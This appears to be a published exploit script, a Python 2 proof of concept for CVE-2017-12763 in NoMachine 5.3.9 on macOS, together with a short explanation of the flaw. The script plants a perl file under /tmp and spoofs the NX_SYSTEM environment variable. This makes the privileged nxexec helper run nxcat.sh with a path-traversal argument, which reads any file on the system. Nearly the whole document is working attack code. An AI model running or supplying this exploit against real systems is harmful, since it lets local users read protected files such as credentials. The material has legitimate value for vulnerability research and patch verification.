42 lines
No EOL
1.8 KiB
Python
Executable file
42 lines
No EOL
1.8 KiB
Python
Executable file
"""
|
|
# Exploit Title: NoMachine LPE - Local Privilege Escalation
|
|
# Date: 09/08/2017
|
|
# Exploit Author: Daniele Linguaglossa
|
|
# Vendor Homepage: https://www.nomachine.com
|
|
# Software Link: https://www.nomachine.com
|
|
# Version: 5.3.9
|
|
# Tested on: OSX
|
|
# CVE : CVE-2017-12763
|
|
|
|
NoMachine uses a file called nxexec in order to execute different action as super user, nxexec allow to execute
|
|
sh files within a sandboxed path, additionally other checks such as parent process name, parent process path are
|
|
performed in order to be sure only NoMachine application are allowed to execute nxexec.
|
|
nxnode.bin allow to spoof a local path via NX_SYSTEM environment variable, this is use to craft a path where a perl
|
|
file will be executed, this PoC exploit the NX_SYSTEM variable in order to allow a custom perl file to call nxexec
|
|
and execute privileged nxcat.sh script in order to read any file on filesystem.
|
|
"""
|
|
|
|
import os
|
|
import sys
|
|
|
|
print "[!] NoMachine - EoP - Read any file by @dzonerzy"
|
|
if len(sys.argv) == 4:
|
|
nxnode = sys.argv[1]
|
|
nxexec = sys.argv[2]
|
|
toread = sys.argv[3]
|
|
user = os.environ.get("USER")
|
|
tmp_path = "/tmp/lib/perl/nxnode"
|
|
tmp_file = "/tmp/lib/perl/nxnode/nxnode.pl"
|
|
tmp_file_content = "print \"[*] Exploiting vulnerability\\n\";" \
|
|
"system(\"{0} " \
|
|
"nxcat.sh 1 {1} 2 '../../../../../..{2}'\");".format(nxexec, user, toread)
|
|
print "[*] Crafting tmp environment"
|
|
os.system("mkdir -p {0}".format(tmp_path))
|
|
with open(tmp_file,"w") as tmp:
|
|
tmp.write(tmp_file_content)
|
|
tmp.close()
|
|
os.system("NX_SYSTEM=/tmp {0}".format(nxnode))
|
|
os.unlink(tmp_file)
|
|
os.system("rm -r /tmp/lib")
|
|
else:
|
|
print "Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0]) |